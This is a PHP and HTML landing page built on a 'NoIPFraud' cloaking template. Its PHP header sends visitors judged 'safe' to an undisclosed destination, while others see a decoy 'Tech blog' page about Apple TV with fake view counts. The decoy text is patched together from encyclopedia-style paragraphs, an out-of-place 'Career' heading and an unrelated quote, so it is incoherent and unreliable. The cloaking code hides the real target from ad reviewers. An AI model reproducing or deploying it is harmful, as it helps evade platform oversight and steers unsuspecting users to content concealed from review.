<?php
//WARNING: ADVANCED NOIPFRAUD TEMPLATE
//define critical variables - do not change!
define('APPLOC','/var/www/app/awesomelion/api/');
$_GET['clid'] = '81e7gdvl';
include(APPLOC.'go.php');
if ( $isItSafe ) {
 //visitor safe - redirect
 noIpFraud();
}
//include your safe landing page below the next line
?>  



<html>
	<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

		<title>Lire l'article</title>
		
		 <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0">
		


		 <style>

		 html {
	box-sizing: border-box;
}

body {
	font-family: Arial, Helvetica, sans-serif;
	background-color:#e9e9e9;
}

*, *:before, *:after {
		box-sizing: inherit;
}

.center {
	text-align: center;
}

.headerLink {
	font-family: 'Cabin', sans-serif;
	font-size: 17px;
	color: #1f599D;
	text-decoration: none;
	margin-bottom: 5px;
	display:block;
}

.statHeader {
	color: #777;
	font-size: 13px;
	font-family: 'Cabin', sans-serif;
	display: inline-block;
	padding-right: 15px;
}

.headerArea, .mainbody {
	background: #fff;
	border: 1px solid #EEE;
	box-shadow: 0 2px 4px 0 #bdbdbd;
	width: 100%;
	max-width: 800px;
	padding: 10px;
	margin: 5px auto 10px auto;
	position: relative;
}


.mainbody {
	padding: 25px;
}

h1.headline {
	text-align:center;
	font-family: 'Lato', sans-serif;
	font-size: 43px;
	font-weight: bold;
	color: #111;
	margin-bottom: 20px;
	padding:0px;
	margin-top: 15px;
}

.bodyText {
	line-height: 25px;
	font-family: 'Cabin', sans-serif;
	font-size: 18px;
	color: #555;
	margin-bottom: 10px;
	text-align: justify;
}

.PageThumb {
	float:left;
	width: 50px;
	margin-right: 10px;
}

.headlineImg {
	display:block;
	width: 100%;
	margin-bottom: 25px;
}

.cta {
	background-color: #019CFE;
    box-shadow: 0 2px 4px 0 rgba(0,0,0,0.50);
    font-family: 'Cabin',sans-serif;
    font-weight: 600;
    font-size: 28px;
    color: #FFFFFF;
    padding: 18px 70px 18px 70px;
    display: table;
    margin: 0 auto 10 auto;
    text-decoration: none;
	text-align: center;
}

.footer {
	width: 100%;
	max-width: 800px;
	margin: 0px auto
}

.footerLink {
	font-size: 13;
	font-family: Avenir-Book;
	padding: 5px;
}

.footerContent {
	font-size: 13;
	font-family: Avenir-Book;
	padding: 5px;
	color: #626262;
}

@media screen and (max-width: 720px)
{
	body {
		padding: 0;
		margin: 0;
	}
	
	h1.headline {
    font-size: 20px;
	margin-top:1px;
	}
	
	.bodyText {
		font-size: 14px;
		line-height: 18px;
	}
	
	.cta {
		padding: 10px 45px 10px 45px;
		
	}
	
	.statHeader {
		padding-right: 50px;
	}
}



</style>
	</head>
	
	<body>
		<div class="center advertorialMessage">Blog</div>
		<div class="headerArea">
			<img src="" class="PageThumb" />
			<a href="#" class="headerLink productLink">Blog</a>
			<span class="statHeader"> <span class="fa fa-calendar-o" aria-hidden="true"></span> 4 days ago</span>
			<span class="statHeader"> <span class="fa fa-street-view" aria-hidden="true"></span> 807,478 views</span>
			<br style="clear:both"/>
		</div>
		<div class="mainBody">
			<h1 class="headline">Tech blog</h1>
			<a href="#" class="productLink">
				<img src="img1.jpg" class="headlineImg" />
			</a>
			<p class="bodyText">
         Apple TV is a digital media player and microconsole developed and sold by Apple Inc. It is a small network appliance and entertainment device that can receive digital data for visual and audio content such as music, video, video games, or the screen display of certain other devices, and play it on a connected television set or other video display.

Apple TV is an HDMI-compliant source device.[5] To use it for viewing, it has to be connected to an enhanced-definition or high-definition widescreen television via an HDMI cable. The device has no integrated controls and can only be controlled remotely, either by an Apple Remote or Siri Remote control device (which is included with Apple TV) using its infrared/Bluetooth capability, by the Apple TV Remote app (downloadable from App Store) on numerous Apple devices using its Wi-Fi capability, or by some third-party gaming controllers and infrared remotes.

Apple TV runs software applications preinstalled with the system software or, for models running tvOS, downloaded from Apple's tvOS App Store over the device's Wi-Fi connection, with the most popular being those that stream video.[8] Major online content sources for Apple TV apps include subscription services for streaming television and film, cable and broadcast networks via TV Everywhere, and major sports leagues. </p>
            <p class="bodyText">
         Career

It was initially described as a “hobby” for Apple. Which, in retrospect, is sort of like Apple saying, “Hey man, I’m just shooting hoops in the backyard,” when actually it’s gunning for a spot in the NBA. Since the product’s launch in 2007, Apple has sold 25 million of these little boxes.

A box like Apple TV — also known as a set-top box — bridges the gap. You connect Apple TV to your TV via HDMI, switch inputs to Apple TV and voila, you are accessing Web video apps on your nice big TV screen.

The funny thing is, even some people with smart TVs still use Apple TV. This might be because they’ve canceled their cable subscription and use Apple TV to access video content on their TV, or because the Apple TV interface is just so much easier to navigate. (I am in the latter camp.)

You asked whether you need an iPhone to use Apple TV. You do not — but you do need an iTunes account, which you’ll use to sign up, log in and buy stuff like TV shows and movies off of Apple TV.

<p class="bodyText">
            <strong>“Many leaders and so many bosses think they have to look as if they are in charge”</strong>
			</p><br>
								
		</div>
	
		<div class="footer center">
			<a href="#" class="footerLink">TERMS</a>  

			<a href="#" target="_blank" class="footerLink">PRIVACY</a>
			<p class="footerContent">© ALL RIGHTS RESERVED.</p>
		</div>
	</body>
</html>
